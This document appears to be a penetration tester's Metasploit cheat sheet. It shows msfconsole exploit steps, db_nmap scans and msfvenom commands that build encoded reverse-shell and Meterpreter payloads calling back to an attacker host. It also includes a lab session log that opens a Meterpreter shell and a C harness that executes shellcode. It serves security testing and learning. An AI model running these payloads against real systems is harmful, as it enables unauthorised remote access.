Metasploit

tags: Security Tools

Reference

Using exploits

Msfconsole

msf> search snmp
msf> use exploit/.../.../...
msf> info
msf> show options
msf> set RHOST 192.168...
msf> set LHOST 192.168...
msf> set LPORT ...
msf> set PAYLOAD windows/...
msf> exploit
  • set a global parameter: msf> setg RHOSTS 192.168...

  • database services

msf> hosts
msf> db_nmap 192.168.31.200-254 --top-ports 20
msf> services -p 443 # list every host with port 443 open

modules

  • Auxiliary

msf > show auxiliary
  • Exploits

MSFVenom

cheatsheet

msfvenom --list payloads | grep linux | grep x64    // search payloads
msfvenom -p linux/x64/exec --list-options           // list options
// generate full interactive reverse shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=7702 -f elf -o msf.bin 

overview

msfvenom -p windows/shell_reverse_tcp  \
LHOST=192.168.30.5                     \
LPORT=443                              \
-f c                                   \
-a x86                                 \
--platform windows                     \
-b "\x00\x0a\x0d"                      \
-e x86/shikata_ga_nai                  \
EXITFUNC=thread

Note that the generated shellcode needs the stack to decode itself, so if the shellcode is placed on the stack (at the position ESP points to), remember to put NOPs at the very front.
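Before pasting a -f c buffer into a test harness it is worth confirming that the encoder really removed every byte listed in -b. The following is an added example (not part of the original notes): it parses the C-array text msfvenom prints and reports any forbidden byte that survived. The sample buffer is constructed for the demo and is not shellcode.

```python
import re

# Constructed sample of the text msfvenom prints with "-f c"; the bytes are
# arbitrary (not real shellcode) so the parser can be exercised offline.
SAMPLE_C_OUTPUT = r'''unsigned char buf[] = 
"\xde\xad\xbe\xef\x41\x42"
"\x0a\x43\x44\x00";
'''

HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')


def parse_c_buffer(text: str) -> bytes:
    """Extract the byte values from msfvenom's C-array output.

    Only the string literals after the buf[] declaration are scanned for
    \\xNN escapes; everything else is ignored.
    """
    m = re.search(r'unsigned\s+char\s+buf\[\]\s*=', text)
    body = text[m.end():] if m else text
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(body))


def parse_badchars(spec: str) -> set:
    """Turn the msfvenom -b argument (e.g. '\\x00\\x0a\\x0d') into a set of ints."""
    return {int(h, 16) for h in HEX_ESCAPE.findall(spec)}


def find_badchars(payload: bytes, badchars: set) -> list:
    """Return (offset, byte) pairs where a forbidden byte is still present."""
    return [(i, b) for i, b in enumerate(payload) if b in badchars]


if __name__ == "__main__":
    payload = parse_c_buffer(SAMPLE_C_OUTPUT)
    hits = find_badchars(payload, parse_badchars(r"\x00\x0a\x0d"))
    print(f"{len(payload)} bytes parsed, bad-char hits: {hits}")
```

An empty hit list means the buffer is clean for the given -b set; any hit means the encoder (or the chosen bad-char list) needs another look before the buffer is used.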

EXITFUNC

  • thread: This method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit)
  • process: This method should be used with multi/handler. This method should also be used with any exploit where a master process restarts it on exit.
  • seh: This method should be used when there is a structured exception handler (SEH) that will restart the thread or process automatically when an error occurs.

shellcode note msfvenom command cheat sheet

Useful Payload

  • use windows/meterpreter/reverse_https
  • use windows/meterpreter/reverse_tcp_allports

Payload staged/non-staged

msfvenom -p <payload> -f <format> LHOST= LPORT= -e <encoder> -b <bad-chars>
# -e x86/shikata_ga_nai
msfvenom --list payloads
  • staged payload: needs Metasploit's exploit/multi/handler, e.g. windows/shell/reverse_tcp
  • non-staged payload: a plain listener such as nc -nvlp [port] is enough, e.g. windows/shell_reverse_tcp (sent in its entirety in one go)
windows/shell/reverse_tcp - Connect back to attacker, Spawn cmd shell (staged)
windows/shell_reverse_tcp - Connect back to attacker and spawn a command shell

example: using staged payload

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.14.12
lhost => 10.10.14.12
msf6 exploit(multi/handler) > set lport 7702
lport => 7702
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
// generate the payload, upload it to the target and execute it
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.12 LPORT=7702 -f elf -o msf.bin
[*] Started reverse TCP handler on 10.10.14.12:7702 
[*] Sending stage (3008420 bytes) to 10.10.10.61
[*] Meterpreter session 1 opened (10.10.14.12:7702 -> 10.10.10.61:46986) at 2020-11-14 21:02:55 +0800

meterpreter > ls

test payload

choose the C output format: -f c

#include <stdio.h>

// paste the buffer printed by msfvenom -f c here
unsigned char buf[] = "";

int main()
{
    // treat the buffer as a function and jump to it
    void (*f)() = (void (*)()) buf;
    f();
    return 0;
}

Compile

gcc -m32 -z execstack

Meterpreter

Online Resources

Commands

execute

meterpreter > execute -f bash -i
-f <opt>  The executable command to run.
-i        Interact with the process after creating it.
-a <opt>  The arguments to pass to the command.
-c        Channelized I/O (required for interaction).